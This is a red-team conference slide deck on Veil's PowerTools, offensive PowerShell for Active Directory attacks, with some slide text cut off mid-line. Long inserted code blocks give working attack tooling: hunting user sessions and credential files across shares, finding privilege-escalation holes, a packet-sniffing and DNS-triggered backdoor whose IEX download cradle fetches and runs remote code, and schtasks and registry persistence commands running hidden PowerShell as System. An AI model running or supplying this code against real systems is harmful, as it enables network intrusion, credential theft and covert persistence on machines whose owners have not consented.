Drilling Deeper with Veil's PowerTools Justin Warner, Will Schroeder Veris Group's Adaptive Threat Division


Justin Warner

◎ Pentester and red teamer for the Adaptive Threat Division of Veris Group
◎ Lots of interest: red team ops, reverse engineering, adversarial tactics, etc.
◎ Developer on the Veil-Framework and co-founder of Veil’s PowerTools

Will Schroeder

◎ Security researcher and red teamer for the Adaptive Threat Division of Veris
◎ Co-founder of the Veil-Framework and founder of Veil’s PowerTools
◎ Cons: Shmoocon, CarolinaCon, Defcon, Derbycon, various BSides

◎ Introduction
◎ Dear M$



How We Got Here

The Veil-Framework

◎ An offensive toolkit aimed at bridging the gap between pentesting and red teaming
◎ Started with the release of Veil-Evasion
○ expanded with Catapult, Pillage, and
◎ CarolinaCon 2014 - “The Veil-

Veil’s PowerTools

◎ All of our offensive PowerShell work from the Veil-Framework (and other projects) was pulled into the new PowerTools repo
◎ PowerTools will remain the primary source for all PowerShell work, with the Veil repo containing offensive Python

Why PowerShell

○ PowerShell provides (out of the box):
□ Full .NET access
□ a signed Microsoft binary that application whitelisting policies typically trust
□ direct access to the Win32 API
□ ability to execute purely in memory
□ default installation Win7+ !
○ “Why I Choose PowerShell as an Attack Platform”
□ http://www.exploit-monday.com/2012/08/Why-I-


“Bad Guys”

“Microsoft’s Post-Exploitation




Domain Situational


◎ Think dsquery on steroids... and cocaine
◎ First started because a client banned “net” commands on domain machines
◎ Otherwise initially inspired by Rob Fuller’s netview.exe tool
○ Wanted something more flexible that also didn’t drop a binary to disk


User Hunting

◎ Goal: find which domain machines specific users are logged into
◎ Invoke-UserHunter: finds where target users or group members are logged into on the network
◎ Invoke-StealthUserHunter: extracts user homeDirectories from AD, gets sessions on all these file servers to hunt for targets
○ Significantly less traffic than Invoke-UserHunter, since it only queries the handful of file servers users map drives to instead of every host in the domain
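The stealth hunting idea above, written out as an added example (this is not PowerView's code): step 1 reads homeDirectory and scriptPath from AD over ADSI and keeps the unique server names, step 2 calls NetSessionEnum at level 10 (which needs no admin rights on the target) against each server and reports sessions belonging to the hunted accounts. The target usernames in $Targets are assumed.

```powershell
# Added example, not PowerView code. Assumes a domain-joined host and a
# domain user token; $Targets is a made-up list of accounts to hunt.

$Targets = @('administrator', 'svc_backup')   # assumed accounts to hunt

# Minimal P/Invoke surface: NetSessionEnum level 10 plus the buffer free call.
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class NetApi {
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct SESSION_INFO_10 {
        public string sesi10_cname;
        public string sesi10_username;
        public uint   sesi10_time;
        public uint   sesi10_idle_time;
    }
    [DllImport("netapi32.dll", CharSet = CharSet.Unicode)]
    public static extern int NetSessionEnum(string ServerName, string UncClientName,
        string UserName, int Level, out IntPtr bufptr, int prefmaxlen,
        ref int entriesread, ref int totalentries, ref int resume_handle);
    [DllImport("netapi32.dll")]
    public static extern int NetApiBufferFree(IntPtr Buffer);
}
"@

function Get-HuntServer {
    # File servers referenced by any user's home directory or logon script.
    $searcher = [adsisearcher]'(&(objectCategory=user)(|(homeDirectory=*)(scriptPath=*)))'
    $searcher.PageSize = 1000
    $null = $searcher.PropertiesToLoad.AddRange([string[]]@('homedirectory', 'scriptpath'))
    $servers = foreach ($r in $searcher.FindAll()) {
        foreach ($attr in 'homedirectory', 'scriptpath') {
            $v = [string]$r.Properties[$attr]
            if ($v -match '^\\\\([^\\]+)\\') { $Matches[1].ToLower() }   # \\server\share -> server
        }
    }
    $servers | Sort-Object -Unique
}

function Get-RemoteSession {
    param([string]$ComputerName)
    $buf = [IntPtr]::Zero; $read = 0; $total = 0; $resume = 0
    $rc = [NetApi]::NetSessionEnum($ComputerName, $null, $null, 10, [ref]$buf, -1,
                                   [ref]$read, [ref]$total, [ref]$resume)
    if ($rc -ne 0) { Write-Verbose "$ComputerName : NetSessionEnum returned $rc"; return }
    try {
        $type = [type][NetApi+SESSION_INFO_10]
        $size = [Runtime.InteropServices.Marshal]::SizeOf($type)
        for ($i = 0; $i -lt $read; $i++) {
            # Walk the array of SESSION_INFO_10 structs returned in the buffer.
            $p = [IntPtr]($buf.ToInt64() + $i * $size)
            $s = [Runtime.InteropServices.Marshal]::PtrToStructure($p, $type)
            [pscustomobject]@{
                Server   = $ComputerName
                User     = $s.sesi10_username
                FromHost = ([string]$s.sesi10_cname).TrimStart('\')
                IdleSec  = $s.sesi10_idle_time
            }
        }
    } finally { $null = [NetApi]::NetApiBufferFree($buf) }
}

foreach ($srv in Get-HuntServer) {
    Get-RemoteSession -ComputerName $srv |
        Where-Object { $Targets -contains $_.User } |
        ForEach-Object { "[+] $($_.User) has a session on $($_.Server) from $($_.FromHost)" }
}
```

The traffic saving comes entirely from the server list: a domain with thousands of workstations usually maps home drives to a handful of file servers, so a handful of RPC calls replaces a full sweep. On hosts hardened with a NetCease-style ACL on SrvsvcSessionInfo, NetSessionEnum returns 5 (access denied) to non-admins, which is the defensive fix for exactly this technique.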

Offensive Event Parsing

◎ Once you get DA, domain controller event logs make it trivial to track down user locations
◎ PowerView’s Get-UserLogonEvents lets you easily extract account logon events (4624) from a host
◎ Invoke-UserEventHunter wraps this all up into a weaponized form
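An added example of the 4624 parsing described above (not PowerView's Get-UserLogonEvents): it pulls logon events from a DC with Get-WinEvent, turns the XML EventData into objects, and drops the noise that hides real user locations (computer accounts, anonymous and local system logons). The DC name and the hunted user are assumed; reading the Security log remotely needs DA or Event Log Readers membership.

```powershell
# Added example, not PowerView code. dc01.test.local and 'jdoe' are assumed.

function Get-LogonEvent {
    param(
        [string]$ComputerName = 'dc01.test.local',   # assumed DC
        [int]$Hours = 24,
        [string[]]$TargetUser                        # optional filter on TargetUserName
    )
    $filter = @{ LogName = 'Security'; Id = 4624; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Each <Data Name="..."> child of EventData becomes a hashtable entry.
            $xml = [xml]$_.ToXml()
            $d = @{}
            foreach ($n in $xml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                User        = $d.TargetUserName
                Domain      = $d.TargetDomainName
                LogonType   = [int]$d.LogonType   # 2 interactive, 3 network, 10 RDP, ...
                SourceIP    = $d.IpAddress
                Workstation = $d.WorkstationName
            }
        } |
        Where-Object {
            $_.User -notmatch '\$$' -and                       # skip computer accounts
            $_.User -notin 'ANONYMOUS LOGON', 'SYSTEM' -and
            $_.SourceIP -notin '-', '127.0.0.1', '::1' -and      # skip local logons on the DC itself
            (-not $TargetUser -or $TargetUser -contains $_.User)
        }
}

# Usage: which addresses has 'jdoe' authenticated to the DC from in the last 24h?
Get-LogonEvent -TargetUser 'jdoe' |
    Sort-Object Time -Descending |
    Format-Table Time, User, LogonType, SourceIP, Workstation -AutoSize
```

Network logons (type 3) to a DC carry the client's IP address, which is what makes the DC log a user-location oracle: every workstation authenticates to a DC on its users' behalf, so one log read replaces touching every host.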

Domain Trusts

◎ PowerView can now enumerate and exploit existing domain trusts:
○ Get-NetDomainTrusts, Get-NetForestDomains
◎ Most PowerView functions now accept a “-Domain <name>” flag, allowing them to operate across trusts
○ e.g. Get-NetUsers –Domain sub.test.local
◎ Invoke-MapDomainTrusts can recursively map all reachable trusts from a foothold
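The recursive mapping idea, as an added example that is not Invoke-MapDomainTrusts itself: a breadth-first walk over System.DirectoryServices.ActiveDirectory starting at the current domain, emitting every trust edge once and skipping domains the current token cannot reach.

```powershell
# Added example, not PowerView code. Starts from the current domain unless
# -StartDomain is given; needs network reachability to a DC of each domain it visits.

function Invoke-TrustWalk {
    param([string]$StartDomain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().Name)
    $seen  = @{}
    $seen[$StartDomain] = $true
    $queue = New-Object System.Collections.Queue
    $queue.Enqueue($StartDomain)

    while ($queue.Count -gt 0) {
        $name = $queue.Dequeue()
        try {
            $ctx    = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Domain', $name)
            $trusts = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($ctx).GetAllTrustRelationships()
        } catch {
            # No line of sight, or no trust path for our token: report and keep walking.
            Write-Warning "Cannot enumerate trusts of $name : $($_.Exception.Message)"
            continue
        }
        foreach ($t in $trusts) {
            [pscustomobject]@{
                Source    = $name
                Target    = $t.TargetName
                Direction = $t.TrustDirection   # Inbound, Outbound, Bidirectional (from Source's view)
                Type      = $t.TrustType        # ParentChild, TreeRoot, External, Forest, ...
            }
            if (-not $seen.ContainsKey($t.TargetName)) {
                $seen[$t.TargetName] = $true
                $queue.Enqueue($t.TargetName)
            }
        }
    }
}

Invoke-TrustWalk | Format-Table -AutoSize
```

Read Direction from the Source domain's point of view: an Inbound edge means the Target trusts Source, so principals from the compromised Source domain can authenticate to Target; those are the edges worth chasing with the -Domain flag.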

Data Mining

◎ PowerView’s Invoke-ShareFinder -CheckAccess can find all shares readable by the current user
◎ Invoke-FileFinder can search a network for open file shares, or take a share list from Invoke-ShareFinder
◎ Spits out a .csv of found files, sortable by creation or last access times
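An added example of the share-finder and file-finder pattern (not PowerView's own code): NetShareEnum at level 1 works as a plain domain user, the -CheckAccess equivalent is simply trying to list the share root, and the file walk writes a CSV that carries the creation and last-access timestamps the slide mentions. The host list and file patterns are assumed.

```powershell
# Added example, not PowerView code. fs01/fs02 and the name patterns are assumed.

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public class ShareApi {
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct SHARE_INFO_1 {
        public string shi1_netname;
        public uint   shi1_type;
        public string shi1_remark;
    }
    [DllImport("netapi32.dll", CharSet = CharSet.Unicode)]
    public static extern int NetShareEnum(string ServerName, int Level, out IntPtr bufptr,
        int prefmaxlen, ref int entriesread, ref int totalentries, ref int resume_handle);
    [DllImport("netapi32.dll")]
    public static extern int NetApiBufferFree(IntPtr Buffer);
}
"@

function Get-ReadableShare {
    param([string[]]$ComputerName)
    foreach ($computer in $ComputerName) {
        $buf = [IntPtr]::Zero; $read = 0; $total = 0; $resume = 0
        if ([ShareApi]::NetShareEnum($computer, 1, [ref]$buf, -1, [ref]$read, [ref]$total, [ref]$resume) -ne 0) { continue }
        try {
            $type = [type][ShareApi+SHARE_INFO_1]
            $size = [Runtime.InteropServices.Marshal]::SizeOf($type)
            for ($i = 0; $i -lt $read; $i++) {
                $s = [Runtime.InteropServices.Marshal]::PtrToStructure([IntPtr]($buf.ToInt64() + $i * $size), $type)
                # Disk shares only (low byte of type is 0), and skip hidden/admin shares.
                if (($s.shi1_type -band 0xFF) -ne 0 -or $s.shi1_netname -match '\$$') { continue }
                $path = "\\$computer\$($s.shi1_netname)"
                # -CheckAccess equivalent: can our token list the share root?
                try { $null = Get-ChildItem -LiteralPath $path -ErrorAction Stop; $path } catch {}
            }
        } finally { $null = [ShareApi]::NetApiBufferFree($buf) }
    }
}

function Find-InterestingFile {
    param([string[]]$SharePath,
          [string[]]$Pattern = @('*pass*', '*cred*', '*.config', '*.kdbx', '*unattend*'))  # assumed patterns
    foreach ($share in $SharePath) {
        Get-ChildItem -LiteralPath $share -Recurse -File -Include $Pattern -ErrorAction SilentlyContinue |
            Select-Object FullName, Length, CreationTime, LastAccessTime, LastWriteTime
    }
}

$hosts = @('fs01', 'fs02')   # assumed; in practice feed this from AD computer enumeration
Get-ReadableShare -ComputerName $hosts |
    Tee-Object -Variable shares |
    ForEach-Object { "[+] readable: $_" }
Find-InterestingFile -SharePath $shares |
    Sort-Object LastAccessTime -Descending |
    Export-Csv -NoTypeInformation found_files.csv
```

Sorting on LastAccessTime is only meaningful where the file server still updates it (NTFS last-access updates are off by default on modern Windows), so treat LastWriteTime as the reliable "recently touched" signal.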

Automating Windows


◎ On past assessments, had to escalate privileges on a locked down workstation
◎ Kernel exploits wouldn’t work, so fell back to vulnerable service binaries
◎ More or less did everything manually, wanted something a bit easier
○ Started implementing the “Encyclopedia of


Windows Services

◎ One of the most effective escalation vectors was (and still is) vulnerable Windows services
○ Sometimes can modify a service itself
○ Get-ServicePerms will check for these
◎ However, many organizations overlook the permissions for service binaries :)
○ Use Get-ServiceEXEPerms, then overwrite the service binary to add a local user or install an

DLL Hijacking

◎ Many programs/services will search in multiple locations when loading, including directories listed in the PATH environment variable
◎ If you have write access to any folder in PATH, there’s a good chance you can drop a malicious DLL and escalate privileges
○ Invoke-FindPathHijack will search for these
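Both checks above, the writable service binary and the writable PATH directory, come down to one question: can the current token write to this path? The following added example (not PowerUp's Get-ServiceEXEPerms or Invoke-FindPathHijack) answers it with one ACL helper and runs that helper over every service binary and every %PATH% entry. All function names are this example's own.

```powershell
# Added example, not PowerUp code. Runs as the low-privilege user you want to
# escalate from; no admin rights needed for the checks themselves.

function Test-CurrentUserWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    # Every SID the current token carries: the user plus all group memberships.
    $id   = [Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User.Value) + @($id.Groups | ForEach-Object { $_.Value })
    # Rights that let us replace or alter the object, plus the generic bits some
    # inherited ACEs still carry (GENERIC_WRITE | GENERIC_ALL).
    $mask = [int][Security.AccessControl.FileSystemRights]'WriteData, AppendData, WriteAttributes, WriteExtendedAttributes, Delete, ChangePermissions, TakeOwnership'
    $mask = $mask -bor 0x40000000 -bor 0x10000000
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }   # quick check: Deny ACEs are not weighed
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($sids -contains $sid -and (([int]$ace.FileSystemRights -band $mask) -ne 0)) { return $true }
    }
    return $false
}

function Get-ServiceBinaryPath {
    # Pull the executable out of a service command line, quoted or not.
    param([string]$CommandLine)
    if ($CommandLine -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($CommandLine -match '^\s*(.+?\.exe)\b') { return $Matches[1] }   # unquoted, may contain spaces
    return ($CommandLine -split '\s+')[0]
}

function Find-WritableServiceBinary {
    # A writable binary for a service running as LocalSystem is a straight escalation:
    # replace it and restart the service (or wait for a reboot).
    Get-WmiObject -Class Win32_Service | ForEach-Object {
        $exe = Get-ServiceBinaryPath $_.PathName
        if (Test-CurrentUserWritable $exe) {
            [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; Binary = $exe }
        }
    }
}

function Find-WritablePathDir {
    # Any writable directory on PATH can host a DLL for a privileged process that
    # searches PATH for a library it cannot find in its own directory or System32.
    $env:PATH -split ';' | Where-Object { $_ } | Sort-Object -Unique |
        Where-Object { Test-CurrentUserWritable $_ } |
        ForEach-Object { [pscustomobject]@{ Directory = $_ } }
}

Find-WritableServiceBinary | Format-Table -AutoSize
Find-WritablePathDir       | Format-Table -AutoSize
```

The ACL walk is deliberately optimistic: it ignores Deny entries and ownership, so confirm a hit by actually opening the file for write before building an escalation around it. A PATH hit only matters if some privileged process actually falls through to PATH for a missing DLL, which is where Invoke-FindPathHijack's per-process checks earn their keep.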


◎ Automates everything we’ve talked about, and more
◎ Invoke-AllChecks will run all current checks against a host
◎ Functions exist to abuse most of the escalation vectors found

Lock Picking the


◎ Incident responders are recognizing and targeting PowerShell.exe
○ Had a client write HIPS rules against psh_psexec, YA, for reals
◎ We wanted to be prepared for more situations like this
◎ Developed PowerPick as a combination of solutions to run PowerShell without

Bypassing the Blacklist

◎ Used assemblies in .NET/C# to execute code
○ System.Management.Automation
◎ Developed SharpPick
○ http://www.sixdub.net/2014/12/02/inexorable-
◎ To defeat this with a blacklist policy (not ideal), you must ACL off or block the System.Management.Automation DLLs in the Global Assembly Cache (GAC), since any managed host can load them without powershell.exe
○ C:\Windows\Assembly\*

Runspaces in Unmanaged Code

◎ SharpPick wasn’t very sexy
○ Binary on disk = Lame!
◎ Lee Christensen (@tifkin_) authored “UnmanagedPowerShell” to utilize .NET assemblies from C
○ Uses CLR and custom .NET assembly in memory
○ https://github.com/leechristensen/UnmanagedPo
◎ Transformed this code into a reflective DLL = ReflectivePick

PowerShell Inception = Injection!!

◎ Decided it needed more PowerShell
◎ Embedded ReflectivePick into Invoke-ReflectivePEInjection from PowerSploit by @josephbialek
○ Created Invoke-PSInjector
◎ Injects DLL into remote process that runs PowerShell code

ReflectivePick Diagram

[Diagram: .NET assembly and download cradle]

PewPewPew: Launching Lazerz at your Targets

◎ Model to run PowerShell scripts on a mass number of machines and retrieve
1. A jobbified webserver is kicked off in the background which serves out a specified PowerShell file
2. An IEX() one-liner is executed on machines through WMI to download/execute the hosted code
3. Results are POSTed back to the local

◎ Executes PowerSploit’s Invoke-Mimikatz on multiple machines without
◎ Raw Mimikatz results are saved on the pivot host
◎ Result files are parsed and Server:Credential objects are output to the pipeline

◎ Microsoft has another gift for attackers, the Windows Search Indexing Service
○ Why search through all of a system’s files when Windows does this for you?
◎ Invoke-MassSearch performs the same pattern as Invoke-MassMimikatz
○ allows you to query the search indexer across machines where you have admin access
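An added example of querying the indexer (not Invoke-MassSearch's code): the Windows Search index is reachable through its OLE DB provider with SQL-like syntax, so a content search over a whole volume is a single query instead of a crawl. Shown as a local function; the mass version is this same body served through the PewPewPew pattern. The search terms are assumed.

```powershell
# Added example, not PowerTools code. Requires the Windows Search service
# (running by default on workstations, usually disabled on servers).

function Search-WindowsIndex {
    param(
        [string[]]$Term = @('password', 'credentials', 'secret'),   # assumed search terms
        [int]$Max = 200
    )
    $conn = New-Object System.Data.OleDb.OleDbConnection(
        "Provider=Search.CollatorDSO;Extended Properties='Application=Windows';")
    # CONTAINS(*, ...) hits indexed content and properties; the LIKE clause catches
    # files whose names match but whose content is not indexed (binaries, archives).
    $clauses = foreach ($t in $Term) {
        $safe = $t -replace "'", "''"
        "CONTAINS(*, '""$safe""') OR System.FileName LIKE '%$safe%'"
    }
    $sql = "SELECT TOP $Max System.ItemPathDisplay, System.Size, System.DateModified " +
           "FROM SYSTEMINDEX WHERE " + ($clauses -join ' OR ')
    $conn.Open()
    try {
        $cmd = New-Object System.Data.OleDb.OleDbCommand($sql, $conn)
        $rdr = $cmd.ExecuteReader()
        while ($rdr.Read()) {
            [pscustomobject]@{
                Host     = $env:COMPUTERNAME
                Path     = $rdr['System.ItemPathDisplay']
                Size     = $rdr['System.Size']
                Modified = $rdr['System.DateModified']
            }
        }
    } finally { $conn.Close() }
}

Search-WindowsIndex | Format-Table -AutoSize
```

The index only covers locations the user's indexing scope includes (profiles, Outlook data, Start Menu by default), so a clean result does not mean the disk is clean; it means the cheap pass came back empty and a targeted Get-ChildItem is the next step.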

New Release

◎ One obvious gap remaining in workflow of Veil PowerTools
◎ Motivation: offense in depth theory
◎ Wanted multiple easy ways to remain resident on the compromised systems
○ Memory only
◎ Yes… More PowerShell
○ Why not utilize our favorite scripting language?!
◎ Goal: automate a bunch of techniques/tools to backdoor a system
◎ Multiple triggers, various host/network signatures
○ We will show some of the “cool” ones
◎ Based on Shmoocon 2013 “Wipe The Drive” by Jake Williams


◎ Uses Get-WinEvent to monitor Windows event logs for failed RDP attempts
◎ When it recognizes “trigger” username, phones home to attacker
○ With an IEX(...) download cradle

◎ Based upon Get-Packet by Robbie Foust http://blog.robbiefoust.com/?p=68
○ Uses system.net.sockets.socket to create raw
○ Uses socket.iocontrol to make promiscuous
◎ Promiscuously sniffs traffic on system and inspects data for “magic” trigger value
○ UDP, TCP, ICMP

◎ Common action of attackers is to add domain/local users
◎ Uses ADSI to monitor for a user
◎ If the user is not found, assumes the worst and phones home

◎ Attempts to be a little stealthier and usable on external assessments
◎ Resolves specified DNS name on interval and if the resolution doesn’t equal a predefined IP...
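Two of the trigger styles described above, the promiscuous sniffer and the DNS canary, as an added example sharing one phone-home routine (this is not PowerBreach's code). The sniffer opens a raw IP socket, switches it to SIO_RCVALL so it sees all traffic on that interface, and scans each datagram's payload for a magic string regardless of whether it arrived over UDP, TCP or ICMP; the DNS trigger compares a name's A record to an expected answer on an interval. Interface IP, magic value, callback URL and canary name are assumed; the raw socket needs admin.

```powershell
# Added example, not PowerBreach code. All addresses, names and the magic
# value are assumed placeholders.

$Callback = 'http://10.0.0.5:8080/stage'    # assumed second-stage URL

function Invoke-PhoneHome {
    # The same IEX download cradle the slides describe, run in this process.
    IEX (New-Object Net.WebClient).DownloadString($Callback)
}

function Start-SniffTrigger {
    param([string]$BindIP, [string]$Magic = 'PwnAll7heThings')   # assumed trigger value
    $sock = New-Object Net.Sockets.Socket -ArgumentList ([Net.Sockets.AddressFamily]::InterNetwork),
                                                        ([Net.Sockets.SocketType]::Raw),
                                                        ([Net.Sockets.ProtocolType]::IP)
    $sock.Bind((New-Object Net.IPEndPoint -ArgumentList ([Net.IPAddress]::Parse($BindIP)), 0))
    $sock.SetSocketOption([Net.Sockets.SocketOptionLevel]::IP,
                          [Net.Sockets.SocketOptionName]::HeaderIncluded, $true)
    # SIO_RCVALL with RCVALL_ON (1): deliver every IP packet seen on this interface.
    $null = $sock.IOControl([Net.Sockets.IOControlCode]::ReceiveAll, [byte[]](1,0,0,0), [byte[]](0,0,0,0))
    $buf = New-Object byte[] 65535
    while ($true) {
        $n = $sock.Receive($buf)
        if ($n -lt 20) { continue }                 # shorter than a minimal IP header
        $proto = $buf[9]                            # 1 ICMP, 6 TCP, 17 UDP
        $ihl   = ($buf[0] -band 0x0F) * 4           # IP header length in bytes
        # Substring scan of everything after the IP header: covers TCP/UDP/ICMP
        # payloads without parsing them. Good enough for a magic value.
        $text = [Text.Encoding]::ASCII.GetString($buf, $ihl, $n - $ihl)
        if ($text.Contains($Magic)) {
            $src = $buf[12..15] -join '.'
            Write-Verbose "trigger from $src (proto $proto)" -Verbose
            Invoke-PhoneHome
            break
        }
    }
    $sock.Close()
}

function Start-DnsTrigger {
    param([string]$Name = 'status.example.com',   # assumed canary name
          [string]$ExpectedIP = '203.0.113.10',    # assumed "all quiet" answer
          [int]$IntervalSec = 300)
    while ($true) {
        $answers = @()
        try { $answers = @([Net.Dns]::GetHostAddresses($Name) | ForEach-Object { $_.IPAddressToString }) } catch {}
        # Fire only on a successful resolution that differs from the expected record;
        # a lookup failure is treated as "unknown" rather than as a trigger.
        if ($answers.Count -gt 0 -and $answers -notcontains $ExpectedIP) { Invoke-PhoneHome; break }
        Start-Sleep -Seconds $IntervalSec
    }
}

# Start-SniffTrigger -BindIP '192.168.1.50'
# Start-DnsTrigger
```

The sniffer's host signature is the raw socket in promiscuous mode, which endpoint tooling can spot; the DNS trigger's only footprint is a periodic lookup of a name the operator controls, which is why the slides call it the stealthier option for external work.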


Persistence… If you must

◎ Focuses more on non-persistent
◎ Scheduled tasks seem to work really well for PowerShell in domain networks

schtasks /create /tn OfficeUpdater /tr "powershell.exe -w hidden -NonI -nop -c 'IEX
pt.ps1'''))'" /sc onlogon /ru System

Registry Storage

◎ Better yet, stage your script in the registry!

$backdoor = "write-host 123"
Set-ItemProperty -Path 'HKLM:\HARDWARE' -Name 'secret' -Value $backdoor

schtasks /create /tn Updater /tr "powershell -c 'IEX (gp HKLM:\HARDWARE secret).secret'" /sc onlogon /ru

○ Caveat: HKLM\HARDWARE is a volatile hive that Windows rebuilds at every boot, so a value staged there is gone after a reboot and the task fires with nothing to run; pick a non-volatile key (and remember writing under HKLM needs admin) for anything that has to survive a restart

So what?

◎ Nothing revolutionary here!
◎ Nothing worse than owning a system and not being able to get back on later!
◎ Real power comes when combining PowerTools
○ PewPewPew with PowerBreach

2 Cents

Almost ready for the show!

Obligatory Defense Slide

◎ HIPS and whitelisting generally help endpoint defense
◎ Enterprise incident response capabilities
○ Memory-only capabilities, but the scripts (“malware”) can still be easily recovered from memory and analyzed
◎ Need a clear way to restrict PowerShell & .NET assemblies to certain users

True Story…

◎ Justin
○ @sixdub
○ http://www.sixdub.net/
○ justin [at] sixdub.net
◎ Will
○ @harmj0y
○ http://blog.harmj0y.net/
○ will [at] harmj0y.net
